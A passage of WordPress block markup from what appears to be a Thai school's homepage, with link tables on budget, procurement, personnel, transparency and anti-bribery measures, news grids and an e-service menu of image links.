{\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=484\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" 